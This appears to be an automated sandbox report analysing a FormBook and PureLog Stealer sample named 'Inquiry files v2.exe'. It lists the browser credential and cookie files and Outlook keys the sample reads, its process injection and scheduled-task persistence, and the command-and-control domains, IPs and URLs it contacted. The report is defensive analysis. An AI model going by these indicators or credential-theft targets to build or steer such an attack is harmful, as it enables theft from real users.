                Source: Yara matchFile source: 0.2.Inquiry files v2.exe.2f9dc88.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Inquiry files v2.exe.7630000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Inquiry files v2.exe.2f9dc88.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2227220590.0000000007630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2482574728.000000000279C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2222224307.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\runas.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.3374402396.0000000001680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3371782022.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2580516163.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3374604831.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2569102143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3374530028.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3375661404.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2571952435.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 9.2.WOzeoJQi.exe.27bdc94.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.WOzeoJQi.exe.27bdc94.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Inquiry files v2.exe.7630000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Inquiry files v2.exe.2f9dc88.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Inquiry files v2.exe.7630000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Inquiry files v2.exe.2f9dc88.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2227220590.0000000007630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2482574728.000000000279C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2222224307.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		512
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		221
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Scheduled Task/Job                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol11
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Abuse Elevation Control Mechanism                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		512
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1475661 Sample: Inquiry files v2.exe Startdate: 18/07/2024 Architecture: WINDOWS Score: 100 52 www.techacademy.store 2->52 54 www.scottifqqy.online 2->54 56 4 other IPs or domains 2->56 68 Snort IDS alert for network traffic 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 Sigma detected: Scheduled temp file as task from temp location 2->72 74 12 other signatures 2->74 10 Inquiry files v2.exe 7 2->10         started        14 WOzeoJQi.exe 5 2->14         started        signatures3 process4 file5 44 C:\Users\user\AppData\Roaming\WOzeoJQi.exe, PE32 10->44 dropped 46 C:\Users\...\WOzeoJQi.exe:Zone.Identifier, ASCII 10->46 dropped 48 C:\Users\user\AppData\Local\...\tmp35FF.tmp, XML 10->48 dropped 50 C:\Users\user\...\Inquiry files v2.exe.log, ASCII 10->50 dropped 84 Writes to foreign memory regions 10->84 86 Allocates memory in foreign processes 10->86 88 Adds a directory exclusion to Windows Defender 10->88 16 RegSvcs.exe 10->16         started        19 powershell.exe 23 10->19         started        21 schtasks.exe 1 10->21         started        90 Multi AV Scanner detection for dropped file 14->90 92 Machine Learning detection for dropped file 14->92 94 Injects a PE file into a foreign processes 14->94 23 schtasks.exe 1 14->23         started        25 RegSvcs.exe 14->25         started        signatures6 process7 signatures8 64 Maps a DLL or memory area into another process 16->64 27 YIJBuAgnqfKMtZ.exe 16->27 injected 66 Loading BitLocker PowerShell Module 19->66 31 WmiPrvSE.exe 19->31         started        33 conhost.exe 19->33         started        35 conhost.exe 21->35         started        37 conhost.exe 23->37         started        process9 dnsIp10 58 www.scottifqqy.online 185.179.189.181, 49726, 80 WEBHOST1-ASRU Russian Federation 27->58 60 ancuapengiu28.com 172.96.191.69, 49727, 49729, 49730 LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG Canada 27->60 62 2 other IPs or domains 27->62 96 Found direct / indirect Syscall (likely to bypass EDR) 27->96 39 runas.exe 13 27->39         started        signatures11 process12 signatures13 76 Tries to steal Mail credentials (via file / registry access) 39->76 78 Tries to harvest and steal browser information (history, passwords, etc) 39->78 80 Modifies the context of a thread in another process (thread injection) 39->80 82 2 other signatures 39->82 42 firefox.exe 39->42         started        process14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Inquiry files v2.exe66%ReversingLabsWin32.Trojan.Leonem
                Inquiry files v2.exe48%VirustotalBrowse
                Inquiry files v2.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\WOzeoJQi.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\WOzeoJQi.exe66%ReversingLabsWin32.Trojan.Leonem
                C:\Users\user\AppData\Roaming\WOzeoJQi.exe48%VirustotalBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                goodneighbor.club0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                http://www.techacademy.store/cf3x/?hR1p0=vfrlb&zRU=fhkUq/P4ZxLEHzd8F0EWLJcdKz8iuYJByq7cV/MxLbJRpCgBGh5YWRli1K1W4zGjT9DiKSmUVr5x94axFxEXagUQ3v8LbuSXuH3vS/EHZpUYZzgfIELv4uP5zGMq9rw/Og9UkuI=0%Avira URL Cloudsafe
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                http://tempuri.org/AppRepairsDataSet.xsdkNo0%Avira URL Cloudsafe
                http://tempuri.org/AppRepairsDataSet.xsdkNo1%VirustotalBrowse
                http://www.goodneighbor.club/qt04/0%Avira URL Cloudsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                http://www.techacademy.store/cf3x/0%Avira URL Cloudsafe
                http://www.ancuapengiu28.com/d3vb/0%Avira URL Cloudsafe
                http://www.goodneighbor.club0%Avira URL Cloudsafe
                http://tempuri.org/AppRepairsDataSet.xsd0%Avira URL Cloudsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                http://tempuri.org/AppRepairsDataSet.xsd1%VirustotalBrowse
                http://www.goodneighbor.club/qt04/1%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.scottifqqy.online
                		185.179.189.181
                		truetrue
                  		unknown
                  ancuapengiu28.com
                  		172.96.191.69
                  		truetrue
                    		unknown
                    www.techacademy.store
                    		13.248.169.48
                    		truetrue
                      		unknown
                      goodneighbor.club
                      		162.159.134.42
                      		truefalseunknown
                      www.goodneighbor.club
                      		unknown
                      		unknowntrue
                        		unknown
                        www.ancuapengiu28.com
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.techacademy.store/cf3x/?hR1p0=vfrlb&zRU=fhkUq/P4ZxLEHzd8F0EWLJcdKz8iuYJByq7cV/MxLbJRpCgBGh5YWRli1K1W4zGjT9DiKSmUVr5x94axFxEXagUQ3v8LbuSXuH3vS/EHZpUYZzgfIELv4uP5zGMq9rw/Og9UkuI=true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.goodneighbor.club/qt04/false
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.ancuapengiu28.com/d3vb/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.techacademy.store/cf3x/true
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://ac.ecosia.org/autocomplete?q=runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://duckduckgo.com/chrome_newtabrunas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/ac/?q=runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/images/branding/product/ico/googleg_lodp.icorunas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/AppRepairsDataSet.xsdkNoInquiry files v2.exe, WOzeoJQi.exe.0.drfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrunas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.ecosia.org/newtab/runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInquiry files v2.exe, 00000000.00000002.2222224307.0000000003027000.00000004.00000800.00020000.00000000.sdmp, WOzeoJQi.exe, 00000009.00000002.2482574728.00000000027F9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.chiark.greenend.org.uk/~sgtatham/putty/0Inquiry files v2.exe, WOzeoJQi.exe.0.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.goodneighbor.clubYIJBuAgnqfKMtZ.exe, 0000000F.00000002.3374402396.00000000016DB000.00000040.80000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/AppRepairsDataSet.xsdInquiry files v2.exe, 00000000.00000002.2222224307.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, WOzeoJQi.exe, 00000009.00000002.2482574728.000000000279C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          13.248.169.48
                          		www.techacademy.storeUnited States
                          		16509AMAZON-02UStrue
                          162.159.134.42
                          		goodneighbor.clubUnited States
                          		13335CLOUDFLARENETUSfalse
                          172.96.191.69
                          		ancuapengiu28.comCanada
                          		59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                          185.179.189.181
                          		www.scottifqqy.onlineRussian Federation
                          		44094WEBHOST1-ASRUtrue

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1475661
                          Start date and time:2024-07-18 07:55:53 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 9m 22s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:19
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:1
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Inquiry files v2.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@20/12@4/4
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 211
                          • Number of non-executed functions: 291
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          01:56:45API Interceptor1x Sleep call for process: Inquiry files v2.exe modified
                          01:56:53API Interceptor15x Sleep call for process: powershell.exe modified
                          01:56:56API Interceptor1x Sleep call for process: WOzeoJQi.exe modified
                          01:58:20API Interceptor101479x Sleep call for process: runas.exe modified
                          07:56:55Task SchedulerRun new task: WOzeoJQi path: C:\Users\user\AppData\Roaming\WOzeoJQi.exe

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          13.248.169.48nK1Y86mbzfbkwpB.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • www.techacademy.store/cf3x/
                          SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.16736.4797.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • www.ansverity.com/7llb/
                          OrderPI.exeGet hashmaliciousFormBookBrowse
                          • www.cetys.com/6uii/
                          PO HA25622.exeGet hashmaliciousFormBookBrowse
                          • www.webmedianews.com/h209/?Dzrx=fA8Yes4AKfUDc53Wnj6AqZfIYHxfB2WY7SMSertcKD9M3ZyyZdC5GDMmxBggMfVQA7Zc&mlYT=SxolxB
                          IMG_00110724.exeGet hashmaliciousFormBookBrowse
                          • www.ansverity.com/7llb/
                          SecuriteInfo.com.Win32.PWSX-gen.17883.22231.exeGet hashmaliciousFormBookBrowse
                          • www.ansverity.com/7llb/
                          Shipping Documents.exeGet hashmaliciousFormBookBrowse
                          • www.ansverity.com/7llb/
                          PTT Group project - Quotation.exeGet hashmaliciousFormBookBrowse
                          • www.webuyfontana.com/cns4/
                          80TeZdsbeA6B6j4.exeGet hashmaliciousFormBookBrowse
                          • www.realtors.biz/mc10/?ejn=jdcBaermB6yQx69Nuq2ME5QFoSRzZwy1xmQ8QxgmqU0bpq2JLrsUggC5m/XlvHoWwQQ/&vVjLC=M6Ah
                          RFQ - MK FMHS.RFQ.24.101.exeGet hashmaliciousFormBookBrowse
                          • www.webuyfontana.com/cns4/
                          162.159.134.42nK1Y86mbzfbkwpB.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • www.goodneighbor.club/qt04/
                          Petromasila 16072024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • www.goodneighbor.club/arws/
                          CC-CREDIT CARD-itineraries.exeGet hashmaliciousFormBookBrowse
                          • www.goodneighbor.club/ua6w/?L0WX3=VguSblgGE2gr11HyBT7GooCC0H7LwBOovKLAJAP7pFJ8CEff3rcgEuyXtoztwl+D0WsHUExksuBetSe4yiwXPO2P1jxDbVWq76NrnMwukHi5CRjf6Y7B46k=&_4B=Rxm4iVs
                          http://heritageconsultants.comGet hashmaliciousUnknownBrowse
                          • heritageconsultants.com/
                          http://www.heritageconsultants.com/Get hashmaliciousUnknownBrowse
                          • www.heritageconsultants.com/
                          http://www.standardmediaindex.comGet hashmaliciousUnknownBrowse
                          • www.standardmediaindex.com/
                          sCzFNAYGKI.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoaderBrowse
                          • redrivergorge.com/admin
                          3yPvcmrbqS.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5SystemzBrowse
                          • directa-plus.com/administrator/
                          Documents.exeGet hashmaliciousFormBookBrowse
                          • www.shufiya.com/gd12/?DPZl=5jUDTf-HoZs&R0Gh=4IUdDy7qYcz3Aj6r2+dL3f372ATDValOWy994H4bQvMIP2krqm+IJVbZ16vdXjwxdhOF
                          php.iniGet hashmaliciousUnknownBrowse
                          • thefortcollins.dentist/

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          www.techacademy.storenK1Y86mbzfbkwpB.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 13.248.169.48
                          www.scottifqqy.onlinenK1Y86mbzfbkwpB.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 185.179.189.181

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          AMAZON-02UShttps://xx0q9nhk.r.eu-west-1.awstrack.me/L0/https:%2F%2Fwww.it-supportdesk.com%2Fsignin%3Ft=eyJhbGciOiJIUzI1NiJ9.eyJ0cmFja2luZ190b2tlbiI6IjMwNWQxN2YxLWY1ZTEtNDRkYS1hN2E0LWM2YjE2MTJjNWZkOSIsImNlbGwiOiJodHRwczovL3V0MHA3amg4NGUuZXhlY3V0ZS1hcGkuZXUtY2VudHJhbC0xLmFtYXpvbmF3cy5jb20vcHJvZC9hcGkvcGhpc2hpbmdjYW1wYWlnbiIsImNhbXBhaWduX3Rva2VuIjoiNjk5MzNmOWUtZmJiMi00MjI4LWEwOWQtZTc1NzIwMzY1YTk4IiwidGVzdF90b2tlbiI6ZmFsc2UsImV4dGVybmFsX3RyYWluaW5nIjpmYWxzZSwiZGlyZWN0X2RlbGl2ZXJ5IjpmYWxzZSwiaWF0IjoxNzIxMjI3NzMxLCJpc3MiOiJodHRwczovL2FwcC5waGlzaHRocmVhdC5jb20iLCJleHAiOjE3MjkwMDM3MzF9.mEP04G0-kO-9MsdDefUe4ZVgMaMzr6MSQ3lnuxDMHKw/1/01020190c12ae356-bb55d2f5-f1fd-4782-b5c7-38db77e0f19a-000000/yvFQgo7_34DVm6G1DTW8hgWNVMI=383Get hashmaliciousUnknownBrowse
                          • 34.241.119.134
                          file.exeGet hashmaliciousUnknownBrowse
                          • 143.204.215.105
                          http://pdkwh.qqddos.cc/4fBJLd13332YTqI371yeiygsooro15197JNRCWECRQQSOABW2364JOKX15627E17Get hashmaliciousUnknownBrowse
                          • 18.192.71.245
                          file.exeGet hashmaliciousUnknownBrowse
                          • 143.204.215.122
                          file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                          • 143.204.215.122
                          SecuriteInfo.com.decompression.bomb.9781.1949.exeGet hashmaliciousUnknownBrowse
                          • 108.139.47.108
                          file.exeGet hashmaliciousUnknownBrowse
                          • 143.204.215.105
                          file.exeGet hashmaliciousUnknownBrowse
                          • 143.204.215.105
                          file.exeGet hashmaliciousUnknownBrowse
                          • 143.204.215.105
                          file.exeGet hashmaliciousUnknownBrowse
                          • 143.204.215.122
                          CLOUDFLARENETUSrASoAfQNeEF5VDs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 172.67.187.202
                          https://CqRnNkhSNO.vk.com/away.php?to=https://farmkidbrand.com/H_qceDTb49iDAGcmuYsWWQ==:o6u15VOqNL2aoHo37RxruyOlPy6TYrNJ-YTuitS3qkQoJvm5K9y2Gc6UL1GsS69tqS_ncyfuytk_ZdTo_EwEQB83_GaFtk0gkxd9YmGhWNZCN9RJHzOU6xC_tMGqMFfOV7Ld9QzNCUUkrckmMcfTP7sjSt8IQkjkk2f1Qmhfy2gtAszBHOnxkkFWSTE0k0-j3l9iEpnhcFJUi2nKF-PsUOtf02Q=#xYWRtaW5Ac3Bpcml0dHJ1Y2tsaW5lcy5jb20=&c=E,1,As5fs8LhE24Di_funLT9Ea4B5ozi609Y19huEYa6Ys2F9KLKEeLK8e8HovAnFunC0lvwIdCok_aD1uvQea9oN3giC8f1j5FYzU5-LCY6Up0,&typo=1Get hashmaliciousHTMLPhisherBrowse
                          • 188.114.96.3
                          http://iffashionenterprise.com/livepartyGet hashmaliciousHTMLPhisherBrowse
                          • 188.114.97.3
                          42ZjBoAnX1.rtfGet hashmaliciousFormBookBrowse
                          • 188.114.97.3
                          http://pdkwh.qqddos.cc/4fBJLd13332YTqI371yeiygsooro15197JNRCWECRQQSOABW2364JOKX15627E17Get hashmaliciousUnknownBrowse
                          • 104.16.119.9
                          https://hresourcinfo.henryscchein.com/?o4i8h=ZRGet hashmaliciousUnknownBrowse
                          • 1.1.1.1
                          SecuriteInfo.com.decompression.bomb.9781.1949.exeGet hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          https://lunchpartybowl.infoGet hashmaliciousHTMLPhisherBrowse
                          • 104.21.91.157
                          https://www.google.com/url?rct=j&sa=t&url=https://www.ufrpe.br/%3Fblank%3D20240717bet%2520estrela%2520da%2520sorte.html&ct=ga&cd=CAEYBCoTNTEwMjQ0ODI4MTc1MzY4MDM2ODIdM2FjMjZmOWJlMDlmMzdlMDpjb20uYXU6ZW46QVU&usg=AOvVaw1mvSPSrHAnx3XZENtwvD5zGet hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          http://7.rcestershir.com/Get hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGnK1Y86mbzfbkwpB.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 172.96.191.69
                          Your file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                          • 209.58.164.109
                          HSBC Bank_Approvel Letter.exeGet hashmaliciousFormBookBrowse
                          • 209.58.164.109
                          https://103.150.10.45:8443/Get hashmaliciousUnknownBrowse
                          • 103.150.10.45
                          PHHOjspjmp.exeGet hashmaliciousCMSBruteBrowse
                          • 209.58.180.90
                          FEB-MAR SOA 2024.exeGet hashmaliciousAgentTeslaBrowse
                          • 172.96.191.121
                          YHZj3QW0oh.exeGet hashmaliciousRemcosBrowse
                          • 23.106.121.144
                          w0vFb4jHKs.exeGet hashmaliciousRemcosBrowse
                          • 23.106.121.144
                          CITIBANK EUROPE PLC. SWIFT TRANSFER (008) CMSWT24019000690.exeGet hashmaliciousRemcosBrowse
                          • 23.106.121.133
                          Swift copy of payment.exeGet hashmaliciousRemcosBrowse
                          • 23.106.121.133

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Inquiry files v2.exe.log

                          Download File
                          Process:C:\Users\user\Desktop\Inquiry files v2.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1730
